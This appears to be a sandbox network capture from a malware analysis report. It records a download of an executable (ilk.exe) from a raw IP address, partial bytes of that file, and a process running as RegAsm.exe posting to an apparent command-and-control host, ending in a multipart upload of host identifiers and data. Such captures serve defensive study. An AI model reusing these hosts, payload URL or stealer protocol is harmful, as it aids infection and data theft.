                                                    Dec 12, 2024 17:33:56.857053041 CET1289INData Raw: 00 54 00 6c 00 4e 00 55 00 61 00 46 00 6c 00 4d 00 52 00 45 00 56 00 4a 00 64 00 56 00 63 00 77 00 53 00 6c 00 5a 00 45 00 56 00 6d 00 64 00 58 00 51 00 6a 00 41 00 30 00 51 00 6b 00 77 00 78 00 61 00 7a 00 64 00 68 00 51 00 6c 00 70 00 44 00 55
                                                    Data Ascii: TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQ
                                                    Dec 12, 2024 17:33:56.857063055 CET1289INData Raw: 62 00 45 00 6c 00 49 00 52 00 47 00 78 00 4e 00 55 00 31 00 70 00 34 00 57 00 6c 00 52 00 52 00 62 00 46 00 46 00 4f 00 52 00 46 00 5a 00 77 00 56 00 6c 00 5a 00 42 00 5a 00 46 00 68 00 43 00 62 00 6e 00 4e 00 49 00 52 00 44 00 46 00 72 00 53 00
                                                    Data Ascii: bElIRGxNU1p4WlRRbFFORFZwVlZBZFhCbnNIRDFrSGZ5WlREbE1GQTBJUUxpdFlGbVlXRUJZRmRBMVZCMFVSVGhZY2FCWVdBRmNSQjNjUlloQlRFVVZPUWtRUV
                                                    Dec 12, 2024 17:33:56.857072115 CET1289INData Raw: 00 57 00 77 00 34 00 59 00 6d 00 4a 00 6e 00 5a 00 45 00 56 00 44 00 4d 00 45 00 6c 00 78 00 51 00 54 00 46 00 6e 00 55 00 6d 00 46 00 6e 00 5a 00 45 00 5a 00 55 00 61 00 46 00 6c 00 59 00 51 00 7a 00 46 00 6e 00 51 00 6b 00 70 00 6e 00 52 00 6b
                                                    Data Ascii: Ww4YmJnZEVDMElxQTFnUmFnZEZUaFlYQzFnQkpnRkVCMWNXQzFrYlFBNVhCVVZPUW44YmNqSkNFQllIREVBY2RBMVlEMU1NRmhwVmRSWkVDMWdGUWxVQWRCQl
                                                    Dec 12, 2024 17:33:57.074033976 CET1289INData Raw: 45 00 31 00 71 00 57 00 6d 00 56 00 46 00 52 00 6b 00 31 00 45 00 51 00 6d 00 35 00 56 00 59 00 57 00 46 00 43 00 57 00 6c 00 52 00 48 00 61 00 30 00 70 00 44 00 57 00 48 00 68 00 5a 00 4e 00 57 00 46 00 52 00 54 00 6c 00 4e 00 4a 00 4d 00 46 00
                                                    Data Ascii: E1qWmVFRk1EQm5VYWFCWlRHa0pDWHhZNWFRTlNJMFlMWG1VUWNqVlpGUUJXTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUU9FcHhCMElqRWw4N1p3OVRFUjV
                                                    Dec 12, 2024 17:33:57.329849005 CET155OUTGET /infopage/ilk.exe HTTP/1.1
                                                    X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                    Host: 147.45.44.131
                                                    Dec 12, 2024 17:33:57.549443007 CET1289INHTTP/1.1 200 OK
                                                    Date: Thu, 12 Dec 2024 16:33:57 GMT
                                                    Server: Apache/2.4.52 (Ubuntu)
                                                    Last-Modified: Thu, 12 Dec 2024 14:31:40 GMT
                                                    ETag: "47e00-6291392989375"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 294400
                                                    Content-Type: application/x-msdos-program
                                                    Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 62 fe 59 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 cc 03 00 00 ae 00 00 00 00 00 00 90 87 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e1 fb 03 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 dc 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c fd [TRUNCATED]
                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELbYg@`@ 9,.text `.rdata "@@.dataP@.CRTB@@.reloc9 :D@B [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.11.2049711172.67.207.384431848C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-12 16:33:59 UTC262OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 8
                                                    Host: immureprech.biz
                                                    2024-12-12 16:33:59 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                    Data Ascii: act=life
                                                    2024-12-12 16:34:00 UTC1017INHTTP/1.1 200 OK
                                                    Date: Thu, 12 Dec 2024 16:33:59 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=e7l6fqmv0p5rackpa4mg7fjmbs; expires=Mon, 07-Apr-2025 10:20:38 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3y8hCx6YkSscsIEAegeOHPOp8PvrWIHJN7DpDdQ%2Bz65BvNUMy9UFIRcQfy9FUov8bygjSvKjaq%2FwBnclr27AcKKxMBeC0lSFU%2BmaJwho%2BdrUYmFww7KFNMAbdyXilAUVpfM%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f0f1e8a1b6212f1-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=114064&min_rtt=114033&rtt_var=24076&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=33589&cwnd=252&unsent_bytes=0&cid=b1f796caf7dc2566&ts=884&x=0"
                                                    2024-12-12 16:34:00 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                    Data Ascii: 2ok
                                                    2024-12-12 16:34:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.11.2049712172.67.207.384431848C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-12 16:34:00 UTC263OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 48
                                                    Host: immureprech.biz
                                                    2024-12-12 16:34:00 UTC48OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 55 6b 67 4c 76 2d 2d 45 42 41 4c 41 59 26 6a 3d
                                                    Data Ascii: act=recive_message&ver=4.0&lid=DUkgLv--EBALAY&j=
                                                    2024-12-12 16:34:00 UTC1019INHTTP/1.1 200 OK
                                                    Date: Thu, 12 Dec 2024 16:34:00 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=3847huvv53tf2h5tggr2rqneb7; expires=Mon, 07-Apr-2025 10:20:39 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bUbDyYWKjZjdR5qX1WOSEutwI3dFsGTKmYnuwt4S9TklP4eMjh4M%2FcSww6wZCMfaT8HUhpj6496zfuhDL%2FmoaMn2s3QwRVMXr%2F%2FVEaQl4InZAVriXuuqLci8Dv9P9qKk%2Br0%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f0f1e918d42b0b1-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=113890&min_rtt=113860&rtt_var=24066&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=947&delivery_rate=33613&cwnd=252&unsent_bytes=0&cid=20a60c0b043fb9c9&ts=594&x=0"
                                                    2024-12-12 16:34:00 UTC350INData Raw: 34 65 31 0d 0a 4c 42 37 55 35 61 7a 74 71 55 55 61 34 4d 50 71 38 72 62 48 61 62 43 31 71 6e 51 36 34 78 4c 79 78 39 66 63 63 6d 35 4c 51 5a 4a 58 50 4b 4c 48 6c 74 6d 46 5a 32 6d 46 34 64 43 47 78 4c 49 4d 6e 4a 66 4c 45 42 6a 5a 64 4a 4f 72 70 4c 6c 65 54 44 30 73 73 42 5a 34 74 59 6e 66 69 49 56 6e 66 35 6a 68 30 4b 6e 4e 35 51 7a 65 6c 35 42 57 58 34 6c 77 6b 36 75 31 76 52 6b 42 4f 79 33 78 52 48 4b 7a 6a 63 6d 4f 7a 53 52 32 6a 61 61 50 6c 39 65 74 42 39 6e 59 77 68 6b 59 7a 7a 43 58 76 66 58 6d 55 43 4d 75 4e 66 4e 68 66 36 65 4f 6a 70 43 46 50 6a 69 46 72 63 6a 49 6c 4b 59 4d 30 74 6e 4d 45 46 47 4c 65 70 71 6a 74 4c 67 59 48 69 49 6e 2b 6b 52 38 73 49 7a 44 68 39 6b 70 66 49 71 74 69 5a 33 58 35 55 57 53 30 4e 42 57 41 4d 45 6a 6f 71 61 6b 72 77
                                                    Data Ascii: 4e1LB7U5aztqUUa4MPq8rbHabC1qnQ64xLyx9fccm5LQZJXPKLHltmFZ2mF4dCGxLIMnJfLEBjZdJOrpLleTD0ssBZ4tYnfiIVnf5jh0KnN5Qzel5BWX4lwk6u1vRkBOy3xRHKzjcmOzSR2jaaPl9etB9nYwhkYzzCXvfXmUCMuNfNhf6eOjpCFPjiFrcjIlKYM0tnMEFGLepqjtLgYHiIn+kR8sIzDh9kpfIqtiZ3X5UWS0NBWAMEjoqakrw
                                                    2024-12-12 16:34:00 UTC906INData Raw: 49 6e 50 67 73 73 31 63 49 6d 71 6a 59 4c 66 72 41 62 66 31 38 55 63 56 34 4a 77 6c 36 2b 2f 73 52 6f 49 4a 43 37 32 54 6e 7a 32 79 59 36 49 30 32 63 67 77 6f 4b 4e 67 4e 4f 70 48 5a 44 74 69 41 6b 57 6d 44 43 58 71 66 58 6d 55 41 51 73 49 50 4e 46 63 37 57 50 78 5a 33 4c 4e 58 36 50 70 4a 71 57 30 61 73 42 30 63 58 43 47 46 36 43 65 5a 75 73 73 4c 6b 55 54 47 64 6a 39 31 59 38 37 73 66 76 67 73 41 72 63 70 57 68 79 49 2b 61 76 45 76 56 32 34 68 4f 47 49 56 78 6c 4b 53 78 73 42 34 49 4a 53 58 2b 51 33 4f 77 6a 63 36 49 77 53 39 77 67 36 79 44 6e 39 53 67 42 74 62 52 78 42 64 64 77 54 37 51 6f 71 33 2b 53 45 77 48 4a 50 4e 63 50 6f 4f 45 77 49 48 4d 4d 54 69 64 37 35 48 51 30 36 6c 4c 69 70 66 47 45 31 65 54 63 59 4b 67 75 36 77 63 43 53 38 75 38 30 42 38
                                                    Data Ascii: InPgss1cImqjYLfrAbf18UcV4Jwl6+/sRoIJC72Tnz2yY6I02cgwoKNgNOpHZDtiAkWmDCXqfXmUAQsIPNFc7WPxZ3LNX6PpJqW0asB0cXCGF6CeZussLkUTGdj91Y87sfvgsArcpWhyI+avEvV24hOGIVxlKSxsB4IJSX+Q3Owjc6IwS9wg6yDn9SgBtbRxBddwT7Qoq3+SEwHJPNcPoOEwIHMMTid75HQ06lLipfGE1eTcYKgu6wcCS8u80B8
                                                    2024-12-12 16:34:00 UTC1369INData Raw: 34 34 33 62 0d 0a 6f 71 70 69 4a 33 56 72 67 50 55 32 73 4d 5a 56 34 5a 34 6b 36 6d 77 73 78 4e 4d 5a 32 50 33 56 6a 7a 75 78 2b 75 42 79 44 5a 70 77 4a 53 4c 6e 74 71 69 48 5a 4c 49 68 67 38 59 68 6e 7a 51 2f 66 57 30 46 77 73 74 4c 76 70 4e 65 4c 4b 4b 77 59 62 43 4c 6d 71 49 72 59 61 43 32 61 38 4f 33 4e 76 4e 47 56 69 41 63 5a 36 76 76 76 35 65 54 43 34 37 73 42 59 38 6d 59 72 65 6e 63 45 73 61 63 43 55 69 35 37 61 6f 68 32 53 79 49 59 50 47 49 5a 38 30 50 33 31 74 52 59 41 4a 53 50 32 58 48 4b 35 6c 63 53 64 7a 79 6c 38 6a 71 2b 42 6e 64 75 67 47 64 62 58 32 68 64 64 68 6e 36 64 74 37 44 2b 58 6b 77 75 4f 37 41 57 50 49 79 7a 79 5a 2f 61 49 44 71 33 6f 6f 61 65 30 37 4e 4c 7a 5a 6e 52 56 6c 2b 4e 4d 4d 6a 6c 74 72 49 64 42 53 77 73 34 6b 52 77 74 35
                                                    Data Ascii: 443boqpiJ3VrgPU2sMZV4Z4k6mwsxNMZ2P3Vjzux+uByDZpwJSLntqiHZLIhg8YhnzQ/fW0FwstLvpNeLKKwYbCLmqIrYaC2a8O3NvNGViAcZ6vvv5eTC47sBY8mYrencEsacCUi57aoh2SyIYPGIZ80P31tRYAJSP2XHK5lcSdzyl8jq+BndugGdbX2hddhn6dt7D+XkwuO7AWPIyzyZ/aIDq3ooae07NLzZnRVl+NMMjltrIdBSws4kRwt5
                                                    2024-12-12 16:34:00 UTC1369INData Raw: 4b 58 79 49 70 49 79 63 33 71 55 4f 77 4e 2f 4f 45 56 53 4a 64 5a 2b 6a 73 4c 4d 58 42 79 6f 78 34 6b 31 34 75 49 75 4f 77 59 73 67 59 4d 4c 35 79 4c 58 44 70 68 76 55 31 49 67 4a 46 70 67 77 6c 36 6e 31 35 6c 41 4d 4a 79 2f 37 53 58 65 39 67 38 71 50 78 69 78 32 6a 4b 69 45 6d 4e 69 69 47 64 2f 53 77 42 78 52 68 48 79 64 70 71 65 39 45 55 78 6e 59 2f 64 57 50 4f 37 48 36 62 7a 38 42 44 69 64 37 35 48 51 30 36 6c 4c 69 70 66 4a 48 6c 2b 50 64 49 4b 72 70 37 41 58 44 43 38 72 2b 45 6c 77 75 49 6e 63 68 38 6f 6e 64 6f 32 70 67 5a 54 56 6f 51 2f 65 30 49 68 59 47 49 5a 6f 30 50 33 31 6c 68 4d 57 4d 32 48 65 52 58 79 78 6c 39 69 55 69 7a 67 32 6d 2b 47 50 6e 4a 54 39 53 39 62 63 77 68 39 62 69 48 53 64 70 62 79 78 47 51 51 6b 4b 2b 4a 50 64 71 53 44 79 34 37
                                                    Data Ascii: KXyIpIyc3qUOwN/OEVSJdZ+jsLMXByox4k14uIuOwYsgYML5yLXDphvU1IgJFpgwl6n15lAMJy/7SXe9g8qPxix2jKiEmNiiGd/SwBxRhHydpqe9EUxnY/dWPO7H6bz8BDid75HQ06lLipfJHl+PdIKrp7AXDC8r+ElwuInch8ondo2pgZTVoQ/e0IhYGIZo0P31lhMWM2HeRXyxl9iUizg2m+GPnJT9S9bcwh9biHSdpbyxGQQkK+JPdqSDy47
                                                    2024-12-12 16:34:00 UTC1369INData Raw: 61 6d 46 6b 39 79 33 43 39 2f 58 32 67 52 65 69 6e 37 51 36 2f 57 35 43 45 78 78 59 38 46 5a 64 2f 61 59 67 4a 61 4c 49 48 54 43 2b 63 69 54 33 71 67 46 77 4e 50 4f 48 56 75 50 65 4a 57 74 73 62 51 64 41 79 49 70 2b 55 5a 38 75 59 4c 47 68 4d 30 70 65 59 53 74 68 64 43 61 35 51 7a 4b 6c 35 42 57 66 35 74 39 6c 72 4b 6b 69 78 63 4d 65 47 50 76 41 47 58 32 67 4d 4c 50 6b 32 64 31 6a 71 75 46 6c 64 43 74 44 4e 48 57 78 42 4a 56 6a 48 53 5a 6f 62 43 73 41 67 6f 6e 49 2f 39 41 63 37 71 56 77 49 72 4c 4b 7a 6a 4d 34 59 2b 49 6c 50 31 4c 34 38 44 49 56 6b 66 50 61 64 43 69 75 66 35 49 54 43 59 75 34 6b 4a 7a 74 6f 62 4e 69 38 41 67 66 6f 53 67 69 35 58 58 6f 41 33 54 31 38 51 63 58 34 6c 36 6e 71 69 7a 75 68 59 4b 61 57 32 77 53 57 54 32 33 34 36 39 78 69 6c 78
                                                    Data Ascii: amFk9y3C9/X2gRein7Q6/W5CExxY8FZd/aYgJaLIHTC+ciT3qgFwNPOHVuPeJWtsbQdAyIp+UZ8uYLGhM0peYSthdCa5QzKl5BWf5t9lrKkixcMeGPvAGX2gMLPk2d1jquFldCtDNHWxBJVjHSZobCsAgonI/9Ac7qVwIrLKzjM4Y+IlP1L48DIVkfPadCiuf5ITCYu4kJztobNi8AgfoSgi5XXoA3T18QcX4l6nqizuhYKaW2wSWT23469xilx
                                                    2024-12-12 16:34:00 UTC1369INData Raw: 2f 54 72 51 54 57 31 38 64 57 46 73 46 33 69 4f 58 74 2f 6a 41 48 50 77 4c 2b 52 57 37 32 6d 49 43 57 69 79 42 30 77 76 6e 49 6e 74 32 6b 41 39 7a 62 77 42 4a 4b 67 58 75 5a 71 72 53 78 45 41 38 6f 4b 66 68 63 65 72 61 4d 78 6f 6a 44 49 33 61 51 6f 49 66 51 6d 75 55 4d 79 70 65 51 56 6d 6d 58 64 35 65 71 39 35 63 58 46 79 67 70 38 30 56 77 39 70 69 41 6c 6f 73 67 64 4d 4c 35 79 4a 33 59 71 41 2f 41 32 38 67 57 55 59 5a 36 67 71 71 36 73 78 4d 4d 4c 44 48 78 58 48 4f 39 67 73 32 4c 78 43 68 30 69 71 76 49 33 70 53 69 45 35 4b 50 69 44 70 62 6b 48 72 53 67 71 2b 6f 46 77 41 34 4b 50 31 43 50 4b 6e 4a 31 38 2f 4d 4b 7a 6a 61 34 59 69 52 32 62 63 4f 30 39 33 43 47 31 43 4f 64 5a 57 71 73 62 6f 62 41 6a 73 74 2f 30 35 36 76 59 62 4c 6a 4d 41 74 64 6f 75 7a 79
                                                    Data Ascii: /TrQTW18dWFsF3iOXt/jAHPwL+RW72mICWiyB0wvnInt2kA9zbwBJKgXuZqrSxEA8oKfhceraMxojDI3aQoIfQmuUMypeQVmmXd5eq95cXFygp80Vw9piAlosgdML5yJ3YqA/A28gWUYZ6gqq6sxMMLDHxXHO9gs2LxCh0iqvI3pSiE5KPiDpbkHrSgq+oFwA4KP1CPKnJ18/MKzja4YiR2bcO093CG1COdZWqsbobAjst/056vYbLjMAtdouzy
                                                    2024-12-12 16:34:00 UTC1369INData Raw: 44 30 64 4c 4e 48 46 53 4e 63 5a 69 73 76 37 73 56 43 69 4d 67 2f 6b 46 39 75 6f 50 48 67 63 4a 6e 4e 73 4b 6d 6b 4e 43 4d 35 54 33 43 30 4e 41 62 53 4d 4e 43 6b 37 53 6b 71 78 30 63 4c 32 48 66 54 58 43 31 67 73 6d 66 69 7a 67 32 6d 2b 47 50 6e 4a 54 39 53 39 4c 54 78 42 56 66 6a 33 2b 64 71 72 4b 31 48 77 59 6e 4d 66 39 4c 64 4c 71 50 77 35 33 42 4c 57 71 4c 71 49 57 65 33 4c 63 49 6b 70 6d 49 45 55 44 42 4b 4e 43 58 76 37 30 63 47 69 51 73 73 46 45 79 72 38 66 4a 67 34 74 2f 4f 4a 43 7a 69 4a 76 55 6f 67 58 41 31 73 41 5a 55 6f 46 32 6d 36 2b 32 74 78 51 43 49 43 58 78 51 33 32 33 68 38 75 50 77 6a 56 31 77 75 2f 49 6c 38 7a 6c 55 35 4c 67 78 42 31 70 67 6d 62 51 75 76 75 6e 55 41 73 6c 59 36 67 4f 66 61 53 4b 78 6f 76 4c 4b 6e 36 4a 6f 49 6d 54 31 4b
                                                    Data Ascii: D0dLNHFSNcZisv7sVCiMg/kF9uoPHgcJnNsKmkNCM5T3C0NAbSMNCk7Skqx0cL2HfTXC1gsmfizg2m+GPnJT9S9LTxBVfj3+dqrK1HwYnMf9LdLqPw53BLWqLqIWe3LcIkpmIEUDBKNCXv70cGiQssFEyr8fJg4t/OJCziJvUogXA1sAZUoF2m6+2txQCICXxQ323h8uPwjV1wu/Il8zlU5LgxB1pgmbQuvunUAslY6gOfaSKxovLKn6JoImT1K
                                                    2024-12-12 16:34:00 UTC1369INData Raw: 6b 46 59 66 67 6d 4b 43 6f 37 61 6f 45 30 73 58 48 64 42 46 61 72 65 4b 78 59 50 31 47 57 32 42 72 34 61 58 77 72 52 4c 6e 4a 66 48 56 67 43 34 4d 4e 6a 6c 69 76 42 51 46 47 6c 37 73 48 74 2f 75 49 6e 4a 6d 64 70 71 57 49 6d 33 69 5a 33 66 71 55 6e 54 32 74 67 52 47 4d 38 77 6c 75 58 74 37 6c 35 4d 4c 54 4b 77 46 69 7a 6b 33 4a 76 63 6e 48 63 71 6e 65 2b 52 30 4d 4c 6c 55 34 43 5a 69 41 51 59 32 54 44 58 70 71 65 73 46 67 38 2f 49 4c 64 77 51 70 61 4d 77 6f 7a 48 4a 6e 2f 43 37 38 69 66 6c 50 30 79 6b 74 54 61 42 42 65 51 5a 70 32 31 73 76 49 59 48 53 51 76 73 41 41 38 2b 6f 50 46 67 38 34 67 61 4d 32 7a 6d 4a 76 59 73 30 66 57 78 59 68 59 47 4a 42 37 6e 37 65 37 75 56 38 64 50 79 37 67 54 58 6d 78 79 38 61 65 78 69 73 34 7a 4f 47 64 6d 39 69 6a 42 73 65
                                                    Data Ascii: kFYfgmKCo7aoE0sXHdBFareKxYP1GW2Br4aXwrRLnJfHVgC4MNjlivBQFGl7sHt/uInJmdpqWIm3iZ3fqUnT2tgRGM8wluXt7l5MLTKwFizk3JvcnHcqne+R0MLlU4CZiAQY2TDXpqesFg8/ILdwQpaMwozHJn/C78iflP0yktTaBBeQZp21svIYHSQvsAA8+oPFg84gaM2zmJvYs0fWxYhYGJB7n7e7uV8dPy7gTXmxy8aexis4zOGdm9ijBse
                                                    2024-12-12 16:34:00 UTC1369INData Raw: 4d 31 68 67 36 75 2b 71 42 64 4d 46 6d 32 77 56 6a 7a 75 78 2f 75 4d 78 53 6c 2f 6c 4c 44 46 74 74 65 69 44 64 48 5a 33 77 63 59 7a 7a 43 57 35 65 33 73 58 6b 77 74 4d 72 41 57 4c 4f 54 63 6d 39 79 63 64 79 71 64 37 35 48 51 77 75 56 54 67 5a 6d 49 42 42 6a 5a 4d 4e 65 72 75 4c 38 54 41 69 6f 78 34 6b 68 2f 6f 49 53 4a 73 66 55 43 64 59 2b 6b 68 70 66 71 6d 79 72 59 78 38 55 5a 58 37 39 4f 70 37 53 79 72 6c 49 71 4b 6a 58 7a 44 6a 4c 32 6e 34 37 58 69 77 5a 79 6b 71 79 48 6c 35 54 72 53 39 61 58 6b 46 5a 39 6a 48 32 56 71 37 4c 38 4d 51 59 35 4c 76 39 4a 50 50 6a 48 77 73 2b 54 5a 33 6d 49 73 59 57 66 30 2b 6b 4d 79 4e 43 49 57 42 69 50 4d 4d 6a 6c 74 4c 51 41 41 53 59 6b 76 45 68 79 75 4d 66 52 77 64 4a 6e 62 73 4c 35 32 39 36 55 74 30 75 4b 6c 34 38 59
                                                    Data Ascii: M1hg6u+qBdMFm2wVjzux/uMxSl/lLDFtteiDdHZ3wcYzzCW5e3sXkwtMrAWLOTcm9ycdyqd75HQwuVTgZmIBBjZMNeruL8TAiox4kh/oISJsfUCdY+khpfqmyrYx8UZX79Op7SyrlIqKjXzDjL2n47XiwZykqyHl5TrS9aXkFZ9jH2Vq7L8MQY5Lv9JPPjHws+TZ3mIsYWf0+kMyNCIWBiPMMjltLQAASYkvEhyuMfRwdJnbsL5296Ut0uKl48Y


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.11.2049713172.67.207.384431848C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-12 16:34:01 UTC272OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=QP2EQTZBZ
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 20488
                                                    Host: immureprech.biz
                                                    2024-12-12 16:34:01 UTC15331OUTData Raw: 2d 2d 51 50 32 45 51 54 5a 42 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 45 34 41 34 35 44 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 51 50 32 45 51 54 5a 42 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 50 32 45 51 54 5a 42 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 45 42 41 4c 41 59 0d 0a 2d 2d 51 50 32 45 51 54 5a 42 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                    Data Ascii: --QP2EQTZBZContent-Disposition: form-data; name="hwid"ABE4A45DB129FD4CDB71E32F12885CB3--QP2EQTZBZContent-Disposition: form-data; name="pid"2--QP2EQTZBZContent-Disposition: form-data; name="lid"DUkgLv--EBALAY--QP2EQTZBZContent-Dis
                                                    2024-12-12 16:34:01 UTC5157OUTData Raw: c6 af b2 d2 c3 4f 74 3a 9a 3a 3e 33 de c8 f0 99 53 73 e3 e7 d9 70 93 b2 13 ce 1d 3b 9b 5e 5e 9e 53 4e a6 e7 ce 56 87 79 72 93 81 b7 6e 36 61 76 88 9f 71 a0 bf ad 5a e8 36 1a 36 a9 1b 99 b3 79 00 7b 16 0a ba e5 b4 8f 87 af 4d 07 78 8e 3e e3 6b 95 4c 36 90 92 a9 a3 b1 52 49 d4 c6 23 b1 70 7e 3e 15 79 ec fc dc fc 62 64 45 bb 1c f1 86 96 72 41 c9 46 b4 b8 9a 8c 11 92 62 dd b1 64 82 ad 90 34 9b 76 8b b2 49 b7 4c 5c c9 c6 b2 b1 c8 f6 e1 e8 f4 71 db aa 55 97 58 ad 90 63 47 1c 3f c6 0a dd 19 e2 96 73 6f ea 49 c6 67 1f b5 d8 a8 84 8f 5d 59 a2 38 35 93 df 86 77 ae 5c 97 c8 33 35 b7 7c 86 b0 7e 5e 8e 0d 4a b3 b1 4c 2a ad a4 f3 85 38 ab 73 0a 29 76 ee 2c 51 b3 f1 44 56 a5 4a ba 98 49 25 e2 e9 44 42 8d 26 c6 d9 ac 64 8e ef 5e 1e e4 b9 70 b6 95 80 8d 93 b6 25 df 2a 2d
                                                    Data Ascii: Ot::>3Ssp;^^SNVyrn6avqZ66y{Mx>kL6RI#p~>ybdErAFbd4vIL\qUXcG?soIg]Y85w\35|~^JL*8s)v,QDVJI%DB&d^p%*-
                                                    2024-12-12 16:34:01 UTC1017INHTTP/1.1 200 OK
                                                    Date: Thu, 12 Dec 2024 16:34:01 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=a8lku48o2obusmn4f3dc391bpb; expires=Mon, 07-Apr-2025 10:20:40 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
